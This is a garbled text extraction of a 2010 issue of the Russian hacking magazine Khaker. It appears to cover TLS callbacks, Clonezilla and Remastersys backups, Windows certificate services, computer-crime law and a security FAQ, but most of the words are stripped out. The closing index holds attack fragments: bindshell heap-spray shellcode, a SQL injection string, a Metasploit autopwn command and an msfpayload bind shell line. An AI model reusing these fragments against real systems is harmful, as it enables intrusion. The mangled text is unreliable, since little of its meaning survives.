, LoadLibrary(Ex),
Access Violation. ? ,
__declspec(thread) .
DLL
__declspec( thread ), . DLL
LoadLibrary ,
__declspec( thread ).
,
, ,
DLL. LoadLibrary
,
__declspec (thread).
DLL API TLS, TlsAlloc, TLS,
DLL LoadLibrary.
, , . ? TLS ? !
PE- (TLS-callback),

. ,
. PE-
, TLS . , , ,
.
TLS , , ,
crackme ,
. Blacklight ,
callback TLS (Thread Local Storage).
Blacklights TLS callback ,
(fork) , .
TLS-,
( DLL),
shell-.
,
, ,
. directory table.
, TLS .
TLS (http://
www.xakep.ru/magazine/xa/118/080/1.asp).
X 10 /141 10
, . ? .
:). , ,
][, ! z
121
SYN/ACK
dhsilabs@mail.ru

LIVEDVD/LIVEUSB
( )
Norton Ghost. Windows (
. .).
.
, , LiveCD/DVD.
?
, LiveCD.
, LiveCD?
, .
:
. ,
, ,
. -
. ? LiveCD,
. , LiveCD (,
LiveDVD,
LiveCD)
. ! . . ,
tar/tgz. 40 ,
, . .
.
, , , ( , ,
,
:)). ,
. 10, 20, 50! .
, LiveCD
.
( + ),
LiveCD 30 (
, ),
. , ,
LiveCD, .
122
40 , N ,
N . ? ,
. LiveCD . 10
= 15 ( ). 10
. ,
, . , !
, .
LiveUSB / , DVD -. LiveCD
.
, LiveCD
/ .
/home,
DVD-.
( ), .
?

Clonezilla. LiveCD, . http://clonezilla.
org : 10 Clonezilla SE
5,6 41 .
10 . ,
, . ,
Clonezilla ,
Windows FreeBSD.
, Remastersys Backup (http://www.geekconnection.org/remastersys/).
, Debian Ubuntu (
X 10 /141/ 10
, Debian),
, , , Fedora Mandriva.
Slackware Linux Live (http://www.linuxlive.org). LiveCD, LiveUSB.
Slackware ?
-
Ubuntu.
, , mklivecd ( Remastersys Backup)
LiveCD Mandriva. , ,
.
- .
CLONEZILLA: NORTON GHOST

Clonezilla ,
( LiveCD
),
.
, / :
1. http://clonezilla.org/download/sourceforge/ ISO-
Clonezilla Live ;
2. Clonezilla Live,
. Clonezilla live.
(, ), Other modes of
Clonezilla live Clonezilla.
Debian , ;
3. . , , . ,
( ?), Don't
touch keymap;
4. Start Clonezilla;
5. device-image: .
device-device ,
;
6. , ,
( ). local_
dev, .
( ) SSH, NFS (Network File System, Need For Speed!)
MS Windows (samba_server);
X 10 /141/ 10
7. , .
, , , Clonezilla ;
8. . savedisk
, saveparts
, restoredisk
, restoreparts
, recovery-iso-zip
;
9. ,
, ;
10. ( Linux), . ,
!
11. recovery-iso-zip LiveDVD/USB,
: iso
DVD, zip LiveUSB, both
,
LiveDVD, LiveUSB. ()
/home/partimag.
! , .
(, ) , /
,
.
REMASTERSYS BACKUP: DEBIAN/UBUNTU

Clonezilla, ,
Remastersys Backup ,
Debian Ubuntu,
ISO- ,
.
Remastersys : , Remastersys, Remastersys,
ISO-, .
Remastersys. sources.list:
sudo nano /etc/apt/sources.list
:
# GRUB v1
123
SYN/ACK
Clonezilla Live
deb http://www.geekconnection.org/remastersys/
repository ubuntu/
# GRUB2
deb http://www.geekconnection.org/remastersys/
repository karmic/
:
sudo apt-get update
sudo apt-get install remastersys
remastersys :
sudo remastersys backup|clean|dist [cdfs|iso]
[filename.iso]
:
backup , ( /home);
Clonezilla
(
GPL);
Ext2, Ext3, Ext4, ReiserFS,
Reiser4, XFS, JFS, FAT, NTFS, HFS (MacOS), UFS (FreeBSD,
NetBSD, OpenBSD), VMFS (VMWare ESX),
Linux, MS Windows, Mac OS
(Intel), FreeBSD, NetBSD OpenBSD;
LVM2 (LVM ver 1 );
GRUB 1 2;
Clonezilla SE (Server Edition)
Multicast , ,
PXE Wake-on-LAN;
Clonezilla , .
124
Debian
clean ,
.
( ), , , ;
dist . , backup,
/home;
cdfs ISO-
(, ISO- );
iso , ISO- ;
[filename.iso] , ISO-,
/home/remastersys.
backup,
, , , . ,
(,
, , , ).
GUI, GUI-
(
,
).
sudo remastersys-gui
LiveUSB Ubuntu , -
Cc
http://clonezilla.org/clonezilla-server-edition/
Clonezilla Server Edition
http://www.cyberciti.biz/tips/download-linuxclonezilla-to-clone-system.html Clonezilla (
)
http://wiki.centos.org/HowTos/PXE/Clonezilla
Clonezilla/DRBL- CentOS/Fedora
https://wiki.edubuntu.org/
SettingUpClonezillaDRBLonUbuntu
Clonezilla/DRBL- Ubuntu
http://www.geekconnection.org/remastersys/ubuntu.
html Remastersys Ubuntu
X 10 /141/ 10
remastersys-gui
LiveUSB
Clonezilla
USB-. ,
(4 , 2 )
Make startup disk.
.
X 10 /141/ 10
LINUX LIVE: SLACKWARE

Slackware. ,
, Ubuntu, . LiveCD Slackware :
( ) : aufs, squashfs.
,
Linux Live (http://www.linux-live.org). ,
2.6.27.27 i486,
Slackware 64-
. Slackware 13 2.6.33, , ,
, LiveCD . (aufs,
squashfs lzma) Linux Live;
, , man', ;
Linux Live http://www.linux-live.org
/tmp;
.config, ;
./build ( /tmp) root. LiveCD /tmp/live_data_NNNN, NNNN
;
make_iso.sh, ISO- bootinst.sh
LiveUSB.
SUMMARY
, ? Debian
Ubuntu, Remastersys
Backup. , ,
Clonezilla , .
Slackware Live, ,
, , Clonezilla . z
125
SYN/ACK
luchnik@it-university.ru, www.it-university.ru

AD CS?
CERTIFICATE SERVICES
WINDOWS SERVER 2008 R2 VS. WINDOWS SRVER 2003
, , SSL-, S/MIME- , .
, ,
, Microsoft
Certificate Services.
Windows Server 2008
Active Directory. Active Directory
Certificate Services (AD CS) , ,
. ,
,
. AD CS Windows Server 2008 R2
:
1. Certification authorities (CAs)
(root) (subordinate)
( ),
, .
2. Web enrollment
-.
3. Online Responder .
4. Network Device Enrollment Service (NDES)
.
SCEP (Simple Certificate Enrollment
Protocol), Cisco. NDES IIS
HKEY_LOCAL_ROOT\Software\
Microsoft\Cryptography\MSCEP.
5. Certificate Enrollment Web Service HTTPS.
6. Certificate Enrollment Policy Web Service
HTTPS. , Web Service
AD LDAP.
Windows Server Certificate Services , Certificate
Services CA Certificate Services Web Enrollment Support,
Windows Server 2008 R2.
126
AD CS
AD CS Itanium Windows Server 2008,
Server Core AD CS , Windows Server 2008 R2.
AD CS Server
2008 ( CA,
Restricted Enrollment Agent ),
R2 (
).
,
CA, Online Responder Web enrollment . AD CS AD DS (Active Directory
Domain Services).
AD CS Server 2008 Server 2008 R2 ,
Windows Server 2003. Certificate
Enrollment Web Services 47 ,
Windows Server 2008 R2. IIS.
AD CS
Server Manager. ,
CAPolicy.inf,
%SYSTEMROOT%.
Certification Authority Certificate Enrollment Web
Service, , CA
Web Service.
Windows Server 2008 COM- ( ICertSrvSetup MSDN),
CA. ,
VBScript.
.
X 10 /141/ 10
. ,
(HSM). ,
(,
),
, HSM.
Microsoft Windows Server 2003 SP1.
AD CS MMC-, .
, Certificates
(certmgr.msc), Certification Authority (certsrv.msc) Certificate
Templates (certtmpl.msc), certutil.exe ertreq.exe.
Online Responder Management (ocsp.msc)
. , Enterprise PKI (pkiview.msc), Windows
Server 2003 Resource Kit PKI Health Tool.
Enterprise PKI
CA, CA, AIA (Authority Information Access) .
PKI. Pkiview ,
CA,
, .
AD CS
Server 2008 R2.
%SYSTEMDRIVE%\ProgramData\Microsoft\Crypto\Keys,
%SYSTEMDRIVE%\Users\All
Users\Microsoft\Crypto\Keys,
.
CA System
State Backup, .
certutil backupKey
<___> Certification Authority.

,
X 10 /141/ 10
.
Enterprise CA . Windows
Server 2000 ,
, ,
.
, (certificate autoenrollment) Windows
Server 2003.
Windows Server 2008 3,
CNG (Cryptography Next Generation).
CNG CryptoAPI, CryptoAPI 1.0 ,
,
. , NSA Suite B Cryptography (
)
, Windows Vista. , ,
,
, Windows XP Windows Server 2003,
, RSA, CNG.
- , CSP
(Cryptography Service Provider) -
CNG.

Enterprise Datacenter. Standard
Server 2008 R2.
CA Windows Server 2003.
Windows Server 2008 R2 Windows 7
(Certificate Template API),
.
, , : , .
,
127
SYN/ACK
Enterprise PKI
Certificate Enrollment Web Services
.
, . certtmpl.msc,
, ,
(,
, ).
CA
Web Enrollment.

, Certificates.

, ? ,
? , ,
PKCS#10 certreq
CA, ,
. ,
.
,
.
,
CA, -. Web Enrollment, ,
, . XEnroll.dll,

, CertEnroll.dll,
, , . Web
Enrollment PKCS #10 ,
.
Windows Server 2008
Kerberos,
Distributed COM (DCOM).
(autoenrollment) , ,
, , . CA Web Enrollment, Server 2008 R2,
WS-Trust. Certificate
Enrollment Policy Web Service Certificate Enrollment Web Service

HTTPS.
Kerberos, , .
CA
, , ,
, , ,
(renewal-only).
, CA,
VS. ONLINE RESPONDER

.
, ,
, , .

(CRL (certificate revocation list)). ,
,
.
, ,
. (Delta CRL),
,
.
Delta CRL ,
, .
,
, , CRL
.
Windows Server 2008 (Online
Responder). . Online Responder
OCSP (Online Certificate Status Protocol),
RFC 2560. ,

.

, ,
,
.
OCSP , Windows Vista.
(Certificate Path Validation Settings Revocation).
, Online Responder .
:
1. Online Responder AD CS.
Online Responder IIS, .
128
X 10 /141/ 10
enrollment policy
AIA Online Responder
Revocation Configuration
2. CA AIA , .
3. ,
Online Responder .
, ,
:
( ), id-pkix-ocsp-nocheck
id-kp-OCSPSigning, CDP AIA.
OCSP Response Signing.
Enterprise CA
Active Directory, (Read Enroll) , Online
Responder. StandAlone CA certutil -v -setreg policy\editflags +EDITF_
ENABLEOCSPREVNOCHECK.
Windows Server 2003 .
4. .
Online Responder Management
revocation configuration.
5. Online Responder ,
CA, Online Responder
. CA certutil -setreg
ca\UseDefinedCACertInRequest 1.
Online Responder , CA, , .
Windows 2003
X 10 /141/ 10
OCSP, , CA.

, .
Windows
Server 2008, R2. ,
, ,
, , .
-, . OCSP,
, -
Microsoft. ,
,
,
.
. ,
, ,
.
-, (, Crypto API XEnroll.dll) , -
, .
-, .
,
CA.
,

. z
129
SYN/ACK
, InfoWatch

. , , , ,
. .

, .
- . , , ... .
, ,
: . ( , ).
(
), , . .
.
, .
.
. . , ,
,
. , .
--- ,
50 ...
.
, ( ), -
. -
, ,
. , , , . ( )
. .

(, ,
,
. Computer drive
licence ).
, () .

- . , , ,
, ( )
, . , ,
, :
130
.
.

.
, -
,
,
.
, :
. ,
: ,
, .
, ,
. .
. , , :
, , ,
. , .
( ),
( ), .
,
.
. -
IP-
( ,
).
(- )
. , .
, ,
. ,
, . .
, , .
, 272 ( ).
X 10 /141/ 10

,
. ,
.
(
). , ,
.
IT .
. .
,
.
: - ,
- , - !
XX , . ,
,
, , . ,
-
. .
.
.

. . , . .

(
,
). ,
. 1928 ,
,
, ,
. .
. ,
,
. X 10 /141/ 10

. , BSA IFPI,
. .
.
50
(. 7.12
), (. 2-3 . 146 ).
- .
, . .
. .
, , ,
, , (
, ). . ,
. ,
50 000 , , .
, , , . ,
:
. , -
.

.
: ,
. ( , )
.
,
(, ),
(, ), ,
(, , ), .
, , .
.
( ), (

: http://www.internet-law.ru/intlaw/crime/faq.htm).
131
SYN/ACK

.
, . - , , .
, ,
. ( )
,
.

.
. ,
. -, MS Office, - -
, SQL-, Java- -
. .
,
(
, . 1295 ). ,
. , , , . , (
) .
.
. 50 000
( ),
.
. , ,
.

(. 1 . 273 )
, .
(. 2 )
.
. ,
-4, .
273- ,
-

,
- ,
http://group.xakep.ru.
! ! ! ,
: lozovsky@gameland.ru
. ,

, ,

, .
132
.
,
- -
.
, (. 2
. 42 ), .
,
: , ,
, . ,
. .
, 273
,
(
, . ,
).

. ,
KGB Spy.
( ),
! , . ,
, ,
- ,
. ,
, .
,
, ( , , :
http://infowatch.livejournal.com/55585.html). ,
, .
, (, ,
)
. .
.
, .
() . (. 13.11 ).
, . ,
. .
.
(
, , , . 2 . 23 ).
, ICQ -,
,
.
,
/
.
,
. , , ,
. ,
, .
,

. (
) ; ,
X 10 /141/ 10
IT
( http://forensics.ru/
zi-ts.html).
, - . .
- ,
,
.

, . ,
. , ,
, ,
. ,
.
, ,
.
(. 171 ).
,
, .
: , ,
.
,
, .

,
. ? . ,
. , .
(
) , X 10 /141/ 10
, . ,
. , ,
. . .
.
, .
,
( ).
, DoS-, ,
, . ,
.
.
- , ,
.
. , .
/.
, .
.
.
, -,
,
. ,
, ,
. , . , .
, . , .
. z
133
UNITS
Oriyana oriyana@xpsycho.ru
PSYCHO:

, : ,
, ?
, , ,
, ,
.
,
,

.
. , ,
, , , , , .
, ,
: ,
( ) - ,

; ,
,

, .
,
: ( ), ,
, , , .

, ,
, ,
. , ;
,
.
,
,
134
,
, ,
.
(phobos)
.
,
, ,
,
.
, ,
, -
( ) ,
, -
. , , ,
.
: , ?
, ,
.
, ,
:
, ,
, .
;
,
, ,
.
, ,
(
), ,
,
, .
- ,
. ,
,
, .
,

.
, ,
, . , .

;

;

.

: ,
, , ,
, ,
.
?
,
(),
, ,
;
,
.
X 10 /141/ 10
.
,
? -
,
,
,
. .
, - ,
, ,
,
, ,
.
, ,
,
, ,
.
. , ,
,
,
, ,
. (-,
)
.
,
.
,
,
.
,
X 10 /141/ 10
, ,
; ? ,

. ,
: -

. , , ,
, - ,
, .
, ,
, .
, . :
. , ;
. : , (,
: ,
, ,
); ,
, .
-: , , , .
;
.
, . ,
: , ,
. , ,
, .
, - .
, ,
. : , , , ( ), ( ), ( ). . .
, -. .
135
UNITS
,
, , . , ,
, ,
.
, ; (); , ;
; - , , ,
. ,
- , . , , .
. , ,
,
, . ,
, :
, .
, ,
, .
.
( ).
. , ,
: , , ,
, , ,
- ; - ,
. , , , .

.
, ,
.
, , ; , .
hom sapiens, ,
, (),
. ,
,
-
. ,
.
, ,
,

.
,
:
,

, ,
,
. ?

: ;
-
136

:
.
.
, ,
,
-
. ,
,
,

, : , , .
: ,
. -, .
, ,
? = = .
: ,
, - , , , ,
.
, ,
, . - ,
; - ,
, ; ,
, , , . , .
,
- ;
,
; .
: ,
.

, (
)
, :
.
.
, ,
; ,

,
, .

. ,
: , ,
X 10 /141/ 10
Joshua Hoffine ,
, ,

:)
PR
.
, ,
?
,
.
, ,
, , , , ,
,
. :

,
- .
.
, , ,
.
,
.
, : ,
: , ,
, ,
,
, .

:

, ,
. ,
, .
.
+ .
( ) + !
, . , .
, .
X 10 /141/ 10
. ,
.
,
,
,

.
,
-
. , ,
,
.
, ,
,
.
137
UNITS
. , ,
, ,
.
,
.

,
.
, ,
.
?
: ,
,
, .
,
, ,
,
(, ). , ,
:
; ,
;
,
, ,

,
. - : ,
:
! ?!
!.
,
: ,
,
,

500 .
, ?
- ,
! ?
30 .. ?
. ?.
,
. ,

,

, , :
.
, ,
,
,
-
138

, ,
,

.
, , , -,
,
. , ,
-.
,
, ,
, , , - , - , ,

. ,
, ,
.
, , , : ? ,
(- ).
, , - .
,
.
? ,
? , , ?
, , . !
,
, ,
. (,
,
),
,
.
, , ,
.
, ,
, ,
, ,
. , ,
,
, :

, ,

1. ,
.
, ,
.
,
.
,
,
, .
. , anyway
,
- .
2.
:
, ?.

. : , ,
:
;
, , ;
.
3. . ,

, ,
. ,

.
:
. ,
.
.
4.
. ,
, ,
-
.
5. ,
, ,
. ,
.
: . ,
:). z
X 10 /141/ 10
8.5
DVD
!
660 . !
? ?
.
.
( )

.
2100 .

72 000 QIWI ()
.
?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru
1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

UNITS
ant
faq
united
@real.xakep.ru
Q: ,
Q: -
, , -
CMS.
A: ,
,

. . Whatweb (www.
morningstarsecurity.com/research/whatweb)
- ,
(CMS), , JavaScript, .. ,
- ,
,
-,
..
250 , CMS . , WordPress,
,
WordPress wp-content.
,
:
A:
.
,
,
URL.
, , CeWL (www.
digininja.org/projects/cewl.php), ,
.
:), . Userpass.py (www.
pauldotcom.com/userpass.py)
Python, Google
Linkedin.com, CeWL. facebook,
myspace ..,
. :
$ ./whatweb www.
morningstarsecurity.com
140
$ python userpass.py "name".
name ,
(
). :
g ,

;
s (,
/ , security);
m , CeWL.
, . ,
.
Q: x64?
A:
. : .
, TDL3,

, . , TDL3

(
www.nobunkum.ru/issue003/tdss-botnet).
Win7 x64
X 10 /141/ 10
,
.
, ,
, .
(Disable PatchGuard & Driver
signature enforcement) x64
. TDL4
MBR
.
,
Mebroot. , ,
x64 .
Q: ,
DLL-?
A: .

LoadLibrary.
DLL
, Windows

( DLL).
DLL,
.
DLL,
Windows
DLL. DLL DLL LoadLibrary
LoadLibraryEx.
, .
.
16- .
Windows.
.
,
.
.
DLL,
,
.

, .
.
. , .
Windows
DLL
. DLL

.

DLL. API
SetDllDirectory (""). DLL
, LoadLibrary
X 10 /141/ 10
HDD
. , LoadLibrary
DLL
Windows. ,
.
Windows, ,

.

LoadLibrary,
DLL
SetDllDirectory(""),

SetDllDirectory("__").
Q: ?
A: schannel.dll, .

,
, Windows.
DWORD retval = SearchPath(NULL,
"schannel", ".dll", err, result,
NULL);
HMODULE handle =
LoadLibrary(result);

,
,
LoadLibrary().
,
.
, .
HMODULE handle =
LoadLibrary("schannel.dll");
Q: ,

?
A: -Microsoft
Process Monitor,

. Process
Monitor (http://technet.microsoft.com/en-us/
sysinternals/bb896645.aspx) ,
.
, . , ,

.
Process Monitor ,
.
.
Metasploit Ruby DLLHijackAuditKit (http://bit.ly/
DLLHijackAuditKit)
.
:
DLLHijackAuditKit;
procmon.exe
( Process Monitor);
Ruby (rubylang.org).
Start
Command Prompt with Ruby,
DLLHijackAuditKit.
141
UNITS
,
.
i386
2-100- ,
.
Q: PDF-. .
ProcMon' DLL Injection

audit.bat
! ,
,
CSV- ProcMon'.

.
DLLTest
ruby generate.rb.
Q: Nmap?
A: Nmap
,
.
TCP-,
. -
(, )
-
,
firewall'.
:
iptables -A INPUT -p tcp --tcp-flags
ACK,FIN FIN -j LOG --log-prefix
"Stealth scan"
iptables -A INPUT -p tcp --tcp-flags
ACK,FIN FIN -j DROP
--tcp-flags ACK,FIN FIN TCP-.

(ACK,FIN)
, , (FIN)
, .
, ,
FIN-, ACK. TCP-
142
,
.
Q:
?
A: , Windows : , . -
GParted (LiveCD Linux'),
.
,
.
HDD,

BootIt. , Vista/Windows7 , .
:

Flip Removable Bit.

. , (,
),
. ,
,
- .
Q: Python?
, .
A: PDFiD (blog.didierstevens.com/programs/
pdf-tools) , PDF-
, ;
PDF-parser
PDF ( );
Origami Walker (security-labs.org/origami)
PDF-;
Origami pdfscan ;
Origami extractjs Jsunpack-ns pdf.py JavaScript- PDF-;
Sumatra PDF (blog.kowalczyk.info/software/
sumatrapdf) MuPDF (ccxvii.net/mupdf) , ,
, ;
Malzilla (www.malzilla.org)
PDF,
JavaScript;
Jsunpack-n (jsunpack.blogspot.com/2009/06/
jsunpack-n-updates-for-pdf-decoding.html)
JavaScript
PCAP--,
PDF-.
Q: ,
Google ? c Picasa Web.
A: , googlecl
(code.google.com/p/googlecl),

. :
Blogger:
$ google blogger post --title "foo"
"command line posting"
Calendar:
$ google calendar add "Lunch with
Jim at noon tomorrow"
Contacts:
$ google contacts list name,email >
contacts.csv
Google Docs:
$ google docs edit --title "Shopping
list"
Picasa:
$ google picasa create --title "Cat
Photos" ~/photos/cats/*.jpg
Youtube:
$ google youtube post --category
Education killer_robots.avi
, .
?
A: . Psyco (psyco.sourceforge.net)
, Python

Google Data API Windows,
Linux. z
X 10 /141/ 10
>Misc
AltDrag 0.8
Camouflage v1.2.1
Daphne 1.47
FilerFrog 2.0.0
Find and Run Robot 2.90
Grindstone 2
HashTab 3.0
KeyPass 4.9.8
NirCmd 2.41
RegSeeker 1.55
Synchronicity 4.3
Synergy 1.3.4
System Silencer 1.2
True Launch Bar 4.4.13 RC
>Games
GunGirl 2 v1.11
Python:
ActivePython 2.7.0.2
Eric5 5.0.2
geany 0.19.1
IronPython 2.6.1
Jython 2.5.2b1
Komodo Edit 5.2.4
Komodo Edit 6.0.0b3
Komodo IDE 5.2.4
Komodo IDE 6.0.0b3
Portable Python 1.1
Pydev for Eclipse 1.6.1
PyScripter v2.2a
Python 2.7
Python 2.7 x64
Python 3.1.2
Python 3.1.2 x64
Spyder 1.1.4
Wing IDE 101 3.2.10
Wing IDE Professional 3.2.10
Wing IDE Professional 4.0.0b4
>Development
ClickHeat 1.10
ECMerge 2.2
UltraEdit 16.20.0
WinAppDbg 1.4
>System
AstroGrep 4.1.4
Auslogics Disk Defrag 3.1.8.150
Auslogics Registry Cleaner 2.0.4.40
BlueScreenView v1.28
CCleaner 2.35
Comodo Internet Security (32bit) 5.0
CrystalDiskMark 3.0.0g
Driver Magician 3.5
Emsisoft HiJackFree 4.0
FreeApps v1.0
GMER 1.0.15.15281
Open Hardware Monitor 0.1.37 Beta
Process Hacker 2.3
PWGen 2.04
Sandboxie 3.48
SetupBatteryCare 0.98
Speccy 1.04
SUMo 2.10.0.95
TechPowerUp GPU-Z v0.3.6
>Security
ChromePasswordDecryptor 1.6
DLLHijackAuditKit v2
DllHijackAuditor 1.0
DynamicLoadLibraryTest
ExploitMyUnion 2.1
FirePassword 3.6
FOCA Free 2.5.2
IEPasswordDecryptor 1.6
Nikto 2.1.3
NmapSI4
OperaPasswordDecryptor 1.0
ProcNetMonitor
RIPS 0.32
Vera 0.20
Wireshark 1.4.0
xsser 0.7a
>Net
Ad Muncher v4.9 Beta Build 32193
BluetoothView 1.40
digsby Build 82 Beta
gpg4win 2.1.0
Home Ftp Server 1.11.0.146
LanTopolog 2.05
Pidgin for Windows 2.7.3
QIP 2010 Build 4000
Skype 5.0 beta 2
TeamSpeak Client for Windows
3.0.0 Beta
TekSIP 2.9
Visual Router
Torrent 2.2beta
>Multimedia
AnyToISO
DualVR 1.7.3
Format Factory 2.5
Greenshot 0.8.0
Picasa for Windows 3.8 Build 115.45
ProgDVB 6.46.4
Songbird 1.8.0
VideoInspector 2.2.6.124
VLC (VideoLAN) for Windows 1.1.4
>Net
Balsa 2.3.28
Claws Mail 3.7.6
Deluge 1.2.2
Drivel 3.0.2
gnash 0.8.8
Google Chrome 5.0.375.127
Lightspark 0.4.3
Links 2.3
Midori 0.2.7
Mitter 0.4.5
Mozilla Firefox 3.6.8
OpenMeetings 1.2
Opera 10.61
Qwit 1.1
>Games
ManiaDrive 1.2
>Devel
ATI Stream SDK 2.2
boost 1.44.0
Fructose 0.9.0
Clojure 1.2
DrPython 3.11.3
GNU make 3.82
iText 5.0.4
MongoDB 1.6.0
Myjit 0.5.0.1
Nitro++ 1.3.39
PixelLight 0.9.2
Poppler 0.14.2
Ruby 1.9.2
SCons 2.0.1
Sdcc 2.9.0
Vaadin 6.4.3
WebIssues 0.9.6
Whoosh 0.3.18
Wt 3.1.4
ZinjaI 20100829
>>UNIX
>Desktop
Adobe Reader 9.3.4
amaroK 2.3.1
Audacious 2.4
Boxee 0.9.22.13
Cairo-dock 2.1.3
DigiKam 1.4.0
Droid 0.2.1
Feh 1.9
GCstar 1.6.1
Glippy 0.0.6.4
Imagination 2.1.1
Inkscape 0.48
KMyMoney 4.5
KOffice 2.2.2
Lifeograph 0.5.6
QGIS 1.5
QtiPlot 0.9.8.1
Shotwell 0.7.0
Vim 7.3
VLC 1.1.4
Webilder 0.6.9
Virtual Router
>System
ATI Catalyst 10.8
Bluez-tools 0.1.18
CDEmu 1.3.0
CLIcompanion 1.0
dd_rescue 1.20
Iptables 1.4.9
Linux Kernel 2.6.35.4
NTFS-3G 2010.8.8
PCSX-Reloaded 1.9.92
q4wine 0.119
SBackup 0.11.1
Smb4k 0.10.8
VirtualBox 3.2.8
Wine 1.3.0
Xorg server 1.9.0
ZFS 0.5
>Server
Apache 2.2.26
BIND 9.7.1
CUPS 1.4.4
DBMail 2.2.16
DHCP 4.2.0
Dovecot 2.0.0
Ejabberd 2.1.5
Freeradius 2.1.9
HAproxy 1.4.7
Lighttpd 1.4.28
MySQL 5.1.50
Nsd 3.2.6
OpenLDAP 2.4.23
OpenSSH 5.6
OpenVPN 2.1.3
Ora2Pg 6.3
Postfix 2.7
Samba 3.5.4
Squid 3.1.7
Vsftpd 2.3.2
>Security
CeWL 3.0
Clamav 0.96.2
Cvechecker 0.5
DotDotPwn 1.0
Firewall Builder 4.1.1
FuzzDiff
Graudit 1.7
Halberd 0.2.4
Listener 2.0.0
Nufw 2.4.3
RSMangler 1.1
Sipwitch 0.9.1
ssh2ftpcrack 2.0
Suricata 1.0.1
Voidssh
WhatWeb 0.4.5
Wireshark 1.2.10
Wpbruteforcer
RabbitMQ 2.0.0
RadioTray 0.6
RSSOwl 2.0.5
Seesmic 0.8
TeamViewer 5.0.8252
Vuze 4.5
AOL/ AOL
10(141) 2010
>>WINDOWS
>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.4.1225
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.4.1
Firefox 3.6.8
foobar2000 1.1
K-Lite Mega Codec Pack 6.3.0
Miranda IM v0.9.2
Notepad++ 5.7
Opera 10.61
PuTTY 0.60
Skype 4.2
Sysinternals Suite
Total Commander 7.55
Unlocker 1.9.0
XnView 1.97.6
x 10 () 2010
141
METASPLOIT FRAMEWORK
-

LINUX
SALITY.AA

VPN-
. 66

AOL
AOL
10 (141) 2010

: 2
10
.
. 54
HACK IN THE BOX

HITB
. 34
. 48
CALLBACK:
UNITS
HTTP:// WWW2
PAYONEER
www.payoneer.com
: ?. (GetAFreelancer,
RentACoder, oDesk, eLance)
. ,
Payoneer (www.payoneer.com),
.
.
Payoneer,
. Payoneer
PayPal, .
TORRENTZ
.torrent
www.torrentz.com
- , .torrent - Google .torrent.

torrentdownloads.net. ,
torrent-.
torrentz.com isohunt.com.
.torrent
. , ,
: torrtilla.ru, 2torrents.org,
kinobaza.tv.
HOW SECURE IS MY
PASSWORD?
www.howsecureismy
password.net
: ,
,
.
. , ,
, .
howsecureismypassword.net, gfhjkm (
) ,
PC 30 . :
, .
#R00t$H3ll 195 , , ,
abcdefg1234567 5722 .
144
IORAD
www.iorad.com
, - .
, ,
, , , .
,
- IORAD.
,
Capture.
X 10 /141/ 10

Хакер 2010 10 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2010 10 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

HACK IN THE BOX

Nod32, Avast, Avira:

LUKS/dm-crypt, TrueCrypt EncFS

Windows Communication Foundation:

Certificate Services Windows Server 2008 R2 vs.

/ .: (495) 935-7034, : (495) 780-8824

/ .: (495) 935-4034, : (495) 780-8824

SMS- Android OS.

Toshiba (Self-Encrypting Drive, SED),

: Intel Core i7-620M 2,66

USB- ASUS CineVibe

ASUS VECTOR BACKPACK

, : LED- 1366x768 , HD-

2,66 Intel Turbo Boost, 3.33 , ,

U43Jc ASUS Bamboo Series :

: LAN (Ethernet) 10/100 /

: LAN (Ethernet) 10/100 /

: ASUS Crosshair IV Formula

, AMD, 2133 , ( Kingston HyperX

Apacer Giant II (DK 02GAL F9QK2)

0 500 1000 1500 2000 2500 3000 3500 4000 4500

Apacer Giant II (DK 02GAL F9QK2)

Apacer Giant II (DK 02GAL F9QK2)

Apacer Giant II (DK 02GAL F9QK2)

Apacer Giant II (DK 02GAL F9QK2)

Apacer Giant II (DK 02GAL F9QK2)

Apacer, Corsair Kingston

0 1000 2000 3000 4000 5000 6000 7000 8000

HTTP- 80, IP ya.ru 93.158.134.3.

if(x < 100)

SIM- SIM Dialer

ivr inum tnum

exten => t,n,Hangup()

1)Sniff Unified sniffing

, , whois, dns lookup ..

main (int argc, char *argv[])

memset(buf, '\0', sizeof buf);

// Skyland win32 bindshell 28876

var shell = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b

while(bigbk.length < space) bigbk+=bigbk;

-mail , file format, :

SET Nokia N900

Adobe Collab.collectEmailInfo Buffer Overflow

LNK Code Execution (MS10-046)

E-MAIL ATTACK VECTOR

Social Engineering CTF

WEB ATTACK VECTOR

Teensy USB HID

Gmail, Google, Facebook, Twitter

CD/DVD/USB ATTACK VECTOR

TEENSY USB HID ATTACK VECTOR

IronGeek WinFang SET

WEB IN THE MIDDLE

, Web in The Middle, Laurent

Apple iWork iLife:

' or 1=1 or ''=,

3.3 . , msfweb. , , ... !

WMAP. WMAP MSF -

PostgreSQL + MSF. db_edit

msf> db_autopwn -t -p -m windows -R excellent

msfpayload windows/shell_bind_tcp LPORT=5555 V >